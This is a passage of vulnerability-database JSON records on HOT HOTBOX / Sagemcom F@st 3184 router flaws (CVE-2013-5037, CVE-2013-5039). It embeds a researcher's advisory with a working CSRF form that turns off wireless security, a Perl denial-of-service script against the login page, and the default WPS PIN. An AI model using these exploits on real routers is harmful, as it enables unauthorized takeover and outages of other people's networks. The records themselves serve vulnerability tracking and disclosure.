"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-5039",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "123901",
"trust": 3.2
},
{
"db": "BID",
"id": "63550",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005733",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-562",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00017",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "29518",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-65041",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"db": "VULHUB",
"id": "VHN-65041"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-562"
},
{
"db": "NVD",
"id": "CVE-2013-5039"
}
]
},
"id": "VAR-201312-0133",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"db": "VULHUB",
"id": "VHN-65041"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00017"
}
]
},
"last_update_date": "2025-04-11T22:48:26.830000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.hot.net.il/heb/Main/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-352",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65041"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"db": "NVD",
"id": "CVE-2013-5039"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
},
{
"trust": 2.4,
"url": "http://www.youtube.com/watch?v=cplt09zij48"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5039"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5039"
},
{
"trust": 0.3,
"url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2013/nov/17"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
},
{
"trust": 0.1,
"url": "http://$host/goform/login\";"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxcsrf.html"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxdos.pl,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"db": "VULHUB",
"id": "VHN-65041"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-562"
},
{
"db": "NVD",
"id": "CVE-2013-5039"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"db": "VULHUB",
"id": "VHN-65041"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-562"
},
{
"db": "NVD",
"id": "CVE-2013-5039"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65041"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"date": "2013-11-04T13:03:33",
"db": "PACKETSTORM",
"id": "123901"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-562"
},
{
"date": "2013-12-30T04:53:07.193000",
"db": "NVD",
"id": "CVE-2013-5039"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00017"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65041"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005733"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-562"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-5039"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "specific network environment",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-562"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "HOT HOTBOX Router Software goform/wlanBasicSecurity Vulnerable to cross-site request forgery",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005733"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "cross-site request forgery",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201312-562"
}
],
"trust": 0.6
}
}
VAR-201312-0131
Vulnerability from variot - Updated: 2025-04-11 22:48The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities: 1. An Information-disclosure Vulnerability 2. An Authentication-bypass vulnerability 3. A Remote Denial-of-service Vulnerability 4. A Directory-traversal Vulnerability 5. An HTML-injection Vulnerability 6. A Cross-site Request-forgery Vulnerability An attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible Sagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. There is a trust management vulnerability in HOT HOTBOX routers using version 2.1.11 software. A remote attacker can exploit this vulnerability to obtain sensitive information through EAP messages. | | The Appliance is manufactured by SAGEMCOM | | and carries the model name F@st 3184. | +------------------------------------------------------------------------------+ | Title: HOTBOX Multiple Vulnerabilities | +--------------------+---------------------------------------------------------+ | Release Date | 2013/09/09 | | Researcher | Oz Elisyan | +--------------------+---------------------------------------------------------+ | System Affected | HOTBOX Router/Modem | | Versions Affected | 2.1.11 , possibly earlier | | Related CVE Numbers | CVE-2013-5037, CVE-2013-5038| | CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, | | CVE-2013-5039 | | Vendor Patched | N/A | | Classification | 0-day | | Exploits | http://elisyan.com/hotboxDoS.pl, | | http://elisyan.com/hotboxCSRF.html | +--------------------+---------------------------------------------------------+
Vulnerabilities List -
Default WPS Pin
Authentication based on IP Address
DoS via crafted POST
Path/Directory Traversal
Script injection via DHCP request
No CSRF Token
Demo - http://www.youtube.com/watch?v=CPlT09ZIj48
CSRF EXPLOIT:
document.getElementById(1).submit();DENIAL OF SERVICE EXPLOIT:
use warnings; use HTTP::Request::Common qw(POST); use LWP::UserAgent;
Author: Oz Elisyan
Date: 3 September 2013
Affected Version: <= 2.1.11
print "# HOTBOX DoS PoC #\n\n"
unless ($ARGV[0]){ print "Please Enter Valid Host Name.\n"; exit(); }
print "Sending Evil POST request...\n";
my $HOST = $ARGV[0]; my $URL = "http://$HOST/goform/login"; my $PostData = "loginUsername=aaaloginPassword=aaa" my $browser = LWP::UserAgent->new(); my $req = HTTP::Request->new(POST => $URL); $req->content_type("application/x-www-form-urlencoded"); $req->content($PostData); my $resp = $browser->request($req);
print "Done.";
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201312-0131",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "hotbox router",
"scope": "eq",
"trust": 3.0,
"vendor": "hot",
"version": "2.1.11"
},
{
"model": "hotbox router",
"scope": "eq",
"trust": 1.0,
"vendor": "hot",
"version": null
},
{
"model": "hotbox router",
"scope": null,
"trust": 0.8,
"vendor": "hot",
"version": null
},
{
"model": "f@st router",
"scope": "eq",
"trust": 0.3,
"vendor": "sagecom",
"version": "31842.1.11"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-560"
},
{
"db": "NVD",
"id": "CVE-2013-5037"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"cpe_match": [
{
"cpe22Uri": "cpe:/h:hot:hotbox_router",
"vulnerable": true
},
{
"cpe22Uri": "cpe:/o:hot:hotbox_router_firmware",
"vulnerable": true
}
],
"operator": "OR"
}
]
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
}
]
},
"credits": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/credits#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Oz Elisyan",
"sources": [
{
"db": "BID",
"id": "63550"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 0.4
},
"cve": "CVE-2013-5037",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "nvd@nist.gov",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "CVE-2013-5037",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 1.8,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "CNVD-2014-00015",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.6,
"vectorString": "AV:A/AC:L/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "LOW",
"accessVector": "ADJACENT_NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 3.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 6.5,
"id": "VHN-65039",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "LOW",
"trust": 0.1,
"vectorString": "AV:A/AC:L/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [],
"severity": [
{
"author": "nvd@nist.gov",
"id": "CVE-2013-5037",
"trust": 1.0,
"value": "LOW"
},
{
"author": "NVD",
"id": "CVE-2013-5037",
"trust": 0.8,
"value": "Low"
},
{
"author": "CNVD",
"id": "CNVD-2014-00015",
"trust": 0.6,
"value": "LOW"
},
{
"author": "CNNVD",
"id": "CNNVD-201312-560",
"trust": 0.6,
"value": "LOW"
},
{
"author": "VULHUB",
"id": "VHN-65039",
"trust": 0.1,
"value": "LOW"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"db": "VULHUB",
"id": "VHN-65039"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-560"
},
{
"db": "NVD",
"id": "CVE-2013-5037"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "The HOT HOTBOX router with software 2.1.11 has a default WPS PIN of 12345670, which makes it easier for remote attackers to obtain the WPA or WPA2 pre-shared key via EAP messages. HOT HOTBOX router is a router device. Sagemcom f@st 3184 routers are prone to the following security vulnerabilities:\n1. An Information-disclosure Vulnerability\n2. An Authentication-bypass vulnerability\n3. A Remote Denial-of-service Vulnerability\n4. A Directory-traversal Vulnerability\n5. An HTML-injection Vulnerability\n6. A Cross-site Request-forgery Vulnerability\nAn attacker can exploit these issues to gain access to potentially sensitive information, bypass certain security restrictions to perform unauthorized actions, steal cookie-based authentication credentials and gain access to system. Other attacks are also possible\nSagemcom f@st 3184 running firmware 2.1.11 is vulnerable; prior versions may also be affected. There is a trust management vulnerability in HOT HOTBOX routers using version 2.1.11 software. A remote attacker can exploit this vulnerability to obtain sensitive information through EAP messages. |\n| The Appliance is manufactured by SAGEMCOM |\n| and carries the model name F@st 3184. |\n+------------------------------------------------------------------------------+\n| Title: HOTBOX Multiple Vulnerabilities |\n+--------------------+---------------------------------------------------------+\n| Release Date | 2013/09/09 |\n| Researcher | Oz Elisyan |\n+--------------------+---------------------------------------------------------+\n| System Affected | HOTBOX Router/Modem |\n| Versions Affected | 2.1.11 , possibly earlier |\n| Related CVE Numbers | CVE-2013-5037, CVE-2013-5038|\n| CVE-2013-5220, CVE-2013-5219, CVE-2013-5218, |\n| CVE-2013-5039 |\n| Vendor Patched | N/A |\n| Classification | 0-day |\n| Exploits | http://elisyan.com/hotboxDoS.pl, |\n| http://elisyan.com/hotboxCSRF.html |\n+--------------------+---------------------------------------------------------+\n\nVulnerabilities List -\n# Default WPS Pin\n# Authentication based on IP Address\n# DoS via crafted POST\n# Path/Directory Traversal\n# Script injection via DHCP request\n# No CSRF Token\n\nDemo -\nhttp://www.youtube.com/watch?v=CPlT09ZIj48\n\n\n\nCSRF EXPLOIT: \n\n\n\u003chtml\u003e\n \u003cform action=\u0027http://192.168.1.1/goform/wlanBasicSecurity\u0027 method=\u0027POST\u0027 id=1\u003e\n \u003cinput type=hidden name=\"WirelessMacAddr\" value=\"C0%3AAC%3A54%3AF8%3A67%3A58\" id=\"WirelessMacAddr\"\u003e\n \u003cinput type=hidden name=\"WirelessEnable1\" value=\"1\" id=\"WirelessEnable1\"\u003e\n\t\t\u003cinput type=hidden name=\"ServiceSetIdentifier1\" value=\"Elisyan\" id=\"ServiceSetIdentifier1\"\u003e\n\t\t\u003cinput type=hidden name=\"WirelessVendorMode\" value=\"3\" id=\"WirelessVendorMode\"\u003e\n\t\t\u003cinput type=hidden name=\"ChannelNumber1\" value=\"0\" id=\"ChannelNumber1\"\u003e\n\t\t\u003cinput type=hidden name=\"NBandwidth1\" value=\"20\" id=\"NBandwidth1\"\u003e\n\t\t\u003cinput type=hidden name=\"ClosedNetwork1\" value=\"0\" id=\"ClosedNetwork1\"\u003e\n\t\t\u003cinput type=hidden name=\"WifiSecurity\" value=\"0\" id=\"WifiSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"commitwlanBasicSecurity\" value=\"1\" id=\"commitwlanBasicSecurity\"\u003e\n\t\t\u003cinput type=hidden name=\"restoreWirelessDefaults1\" value=\"0\" id=\"restoreWirelessDefaults1\"\u003e\n\t\t\u003cinput type=hidden name=\"scanActions1\" value=\"0\" id=\"scanActions1\"\u003e\n\t\t\u003cinput type=hidden name=\"AutoSecurity1\" value=\"1\" id=\"AutoSecurity1\"\u003e\n\t\t\u003cinput type=hidden name=\"wpsActions1\" value=\"0\" id=\"wpsActions1\"\u003e\n\t\t\n\n \u003c/form\u003e\n\u003c/html\u003e\n\u003cscript\u003edocument.getElementById(1).submit();\u003c/script\u003e\n\n\n\nDENIAL OF SERVICE EXPLOIT:\n\nuse warnings;\nuse HTTP::Request::Common qw(POST);\nuse LWP::UserAgent;\n\n\n# Author: Oz Elisyan\n# Date: 3 September 2013\n# Affected Version: \u003c= 2.1.11\n\nprint \"# HOTBOX DoS PoC #\\n\\n\"\n\nunless ($ARGV[0]){\n\tprint \"Please Enter Valid Host Name.\\n\";\n\texit();\n}\n\nprint \"Sending Evil POST request...\\n\";\n\nmy $HOST = $ARGV[0];\nmy $URL = \"http://$HOST/goform/login\";\nmy $PostData = \"loginUsername=aaaloginPassword=aaa\"\nmy $browser = LWP::UserAgent-\u003enew();\nmy $req = HTTP::Request-\u003enew(POST =\u003e $URL);\n$req-\u003econtent_type(\"application/x-www-form-urlencoded\");\n$req-\u003econtent($PostData);\nmy $resp = $browser-\u003erequest($req);\n\nprint \"Done.\";\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2013-5037"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "VULHUB",
"id": "VHN-65039"
},
{
"db": "PACKETSTORM",
"id": "123901"
}
],
"trust": 2.61
},
"exploit_availability": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/exploit_availability#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"reference": "https://www.scap.org.cn/vuln/vhn-65039",
"trust": 0.1,
"type": "unknown"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65039"
}
]
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2013-5037",
"trust": 3.5
},
{
"db": "PACKETSTORM",
"id": "123901",
"trust": 3.2
},
{
"db": "BID",
"id": "63550",
"trust": 0.9
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005731",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201312-560",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2014-00015",
"trust": 0.6
},
{
"db": "EXPLOIT-DB",
"id": "29518",
"trust": 0.1
},
{
"db": "SEEBUG",
"id": "SSVID-83016",
"trust": 0.1
},
{
"db": "VULHUB",
"id": "VHN-65039",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"db": "VULHUB",
"id": "VHN-65039"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-560"
},
{
"db": "NVD",
"id": "CVE-2013-5037"
}
]
},
"id": "VAR-201312-0131",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"db": "VULHUB",
"id": "VHN-65039"
}
],
"trust": 1.325
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00015"
}
]
},
"last_update_date": "2025-04-11T22:48:26.791000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://www.hot.net.il/heb/Main/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-255",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-65039"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"db": "NVD",
"id": "CVE-2013-5037"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 3.1,
"url": "http://packetstormsecurity.com/files/123901/hotbox-2.1.11-csrf-traversal-denial-of-service.html"
},
{
"trust": 2.4,
"url": "http://www.youtube.com/watch?v=cplt09zij48"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2013-5037"
},
{
"trust": 0.8,
"url": "http://web.nvd.nist.gov/view/vuln/detail?vulnid=cve-2013-5037"
},
{
"trust": 0.3,
"url": "http://www.sagemcom.com/index.php?id=1760\u0026l=25"
},
{
"trust": 0.3,
"url": "http://seclists.org/fulldisclosure/2013/nov/17"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5038"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5220"
},
{
"trust": 0.1,
"url": "http://$host/goform/login\";"
},
{
"trust": 0.1,
"url": "http://192.168.1.1/goform/wlanbasicsecurity\u0027"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5037"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxcsrf.html"
},
{
"trust": 0.1,
"url": "http://elisyan.com/hotboxdos.pl,"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5039"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5219"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2013-5218"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"db": "VULHUB",
"id": "VHN-65039"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-560"
},
{
"db": "NVD",
"id": "CVE-2013-5037"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"db": "VULHUB",
"id": "VHN-65039"
},
{
"db": "BID",
"id": "63550"
},
{
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"db": "PACKETSTORM",
"id": "123901"
},
{
"db": "CNNVD",
"id": "CNNVD-201312-560"
},
{
"db": "NVD",
"id": "CVE-2013-5037"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65039"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"date": "2013-11-04T13:03:33",
"db": "PACKETSTORM",
"id": "123901"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-560"
},
{
"date": "2013-12-30T04:53:07.147000",
"db": "NVD",
"id": "CVE-2013-5037"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2014-01-02T00:00:00",
"db": "CNVD",
"id": "CNVD-2014-00015"
},
{
"date": "2013-12-30T00:00:00",
"db": "VULHUB",
"id": "VHN-65039"
},
{
"date": "2013-09-09T00:00:00",
"db": "BID",
"id": "63550"
},
{
"date": "2014-01-06T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2013-005731"
},
{
"date": "2013-12-31T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201312-560"
},
{
"date": "2025-04-11T00:51:21.963000",
"db": "NVD",
"id": "CVE-2013-5037"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
